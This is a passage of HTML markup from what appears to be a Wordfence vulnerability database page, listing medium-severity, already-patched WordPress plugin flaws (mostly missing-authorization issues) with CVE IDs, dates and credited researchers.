<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-extended" target="_blank" rel="noopener">Advanced Custom Fields: Extended</a> <span class="wfvr-software-slug">[acf-extended]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bb5b64d1-8e13-44aa-b158-4cb6fd50e7cd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/faf44730-b975-4057-96dc-7284775500f9" target="_blank" rel="noopener">BetterLinks &lt;= 3.1.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Short URL Creation via create_fbs_link AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19801" target="_blank" rel="noopener noreferrer">							CVE-2026-19801						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/betterlinks" target="_blank" rel="noopener">BetterLinks – Link Shortener, Link Cloaking, Redirects, Affiliate Link Manager &amp; MCP</a> <span class="wfvr-software-slug">[betterlinks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/faf44730-b975-4057-96dc-7284775500f9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/286b3e24-bd13-4885-a57b-28e2bd71c407" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment &lt;= 2.7.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81762" target="_blank" rel="noopener noreferrer">							CVE-2026-81762						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-and-rental-manager-for-woocommerce" target="_blank" rel="noopener">Booking and Rental Manager for Bike | Car | Resort | Appointment | Dress | Equipment</a> <span class="wfvr-software-slug">[booking-and-rental-manager-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/286b3e24-bd13-4885-a57b-28e2bd71c407" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/636bf04e-e9ef-4691-969d-0a7249a6044e" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia 1.2.32 &#8211; 2.4.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77704" target="_blank" rel="noopener noreferrer">							CVE-2026-77704						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louise" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fc9c08d9df7f134cb77bb16f407f825a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fc9c08d9df7f134cb77bb16f407f825a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louise" target="_blank" rel="noopener">Louise</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/636bf04e-e9ef-4691-969d-0a7249a6044e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ff3cf3a-1b28-4662-b0ef-a76f729635e7" target="_blank" rel="noopener">Content Mask 1.8.0 &#8211; 1.8.5.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77003" target="_blank" rel="noopener noreferrer">							CVE-2026-77003						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-mask" target="_blank" rel="noopener">Content Mask</a> <span class="wfvr-software-slug">[content-mask]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fran-ramirez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b1aa5a0f2e6479b3ad0ee9bf73a43047.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1aa5a0f2e6479b3ad0ee9bf73a43047"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fran-ramirez" target="_blank" rel="noopener">Fran Ramírez</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7ff3cf3a-1b28-4662-b0ef-a76f729635e7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8dbb8e0f-c846-47c0-bdae-14520e960d73" target="_blank" rel="noopener">Directorist: AI-Powered Business Directory, Listings &amp; Classified Ads 8.5 &#8211; 8.9.2 &#8211; Authenticated (Subscriber+) Arbitrary Image Move</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77757" target="_blank" rel="noopener noreferrer">							CVE-2026-77757						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/directorist" target="_blank" rel="noopener">Directorist: AI-Powered Business Directory, Listings &amp; Classified Ads</a> <span class="wfvr-software-slug">[directorist]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8dbb8e0f-c846-47c0-bdae-14520e960d73" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88fa97ce-191c-4e95-89b2-2e8a81bcbdf0" target="_blank" rel="noopener">Ditty – Responsive News Tickers, Sliders, and Lists &lt;= 3.1.67 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81274" target="_blank" rel="noopener noreferrer">							CVE-2026-81274						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 26, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ditty-news-ticker" target="_blank" rel="noopener">Ditty – Responsive News Tickers, Sliders, and Lists</a> <span class="wfvr-software-slug">[ditty-news-ticker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/88fa97ce-191c-4e95-89b2-2e8a81bcbdf0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a127f1dc-9343-46d4-8ce2-7d0d2a7a960c" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy &lt; 5.0.14 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16577" target="_blank" rel="noopener noreferrer">							CVE-2026-16577						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dokan-lite" target="_blank" rel="noopener">Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy</a> <span class="wfvr-software-slug">[dokan-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhaveshkumar-parmar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1509f4074eb474ab3027fc87140a9f43.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1509f4074eb474ab3027fc87140a9f43"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bhaveshkumar-parmar" target="_blank" rel="noopener">Bhaveshkumar Parmar</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a127f1dc-9343-46d4-8ce2-7d0d2a7a960c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5a76c2b-b4c8-47aa-83ac-cc36c100d70e" target="_blank" rel="noopener">Duplicate Post &lt; 1.5.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19435" target="_blank" rel="noopener noreferrer">							CVE-2026-19435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/copy-delete-posts" target="_blank" rel="noopener">Duplicate Post</a> <span class="wfvr-software-slug">[copy-delete-posts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5a76c2b-b4c8-47aa-83ac-cc36c100d70e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9dbfa5b6-9d8a-4874-8586-0581272ccc40" target="_blank" rel="noopener">Duplicate Post &lt; 1.5.6 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19085" target="_blank" rel="noopener noreferrer">							CVE-2026-19085						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/copy-delete-posts" target="_blank" rel="noopener">Duplicate Post</a> <span class="wfvr-software-slug">[copy-delete-posts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9dbfa5b6-9d8a-4874-8586-0581272ccc40" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a4a017-8a1d-400c-940b-f188513d23c2" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar &lt;= 5.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81759" target="_blank" rel="noopener noreferrer">							CVE-2026-81759						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a4a017-8a1d-400c-940b-f188513d23c2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6b41c7f-06e9-4cba-ae64-b4d6b0df4cc4" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar &lt;= 5.5.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81761" target="_blank" rel="noopener noreferrer">							CVE-2026-81761						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</a> <span class="wfvr-software-slug">[mage-eventpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f6b41c7f-06e9-4cba-ae64-b4d6b0df4cc4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c6b9cb0-99db-414d-be9c-8722e37bb473" target="_blank" rel="noopener">Finale Lite – Sales Countdown Timer &amp; Discount for WooCommerce &lt; 2.21.0 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78138" target="_blank" rel="noopener noreferrer">							CVE-2026-78138						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/finale-woocommerce-sales-countdown-timer-discount" target="_blank" rel="noopener">Finale Lite – Sales Countdown Timer &amp; Discount for WooCommerce</a> <span class="wfvr-software-slug">[finale-woocommerce-sales-countdown-timer-discount]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c6b9cb0-99db-414d-be9c-8722e37bb473" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bec19d80-ba51-4ff8-a111-c2e45928fb51" target="_blank" rel="noopener">Fluent Boards Pro &lt;= 2.0.11 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78278" target="_blank" rel="noopener noreferrer">							CVE-2026-78278						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-boards-pro" target="_blank" rel="noopener">Fluent Boards Pro</a> <span class="wfvr-software-slug">[fluent-boards-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bec19d80-ba51-4ff8-a111-c2e45928fb51" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
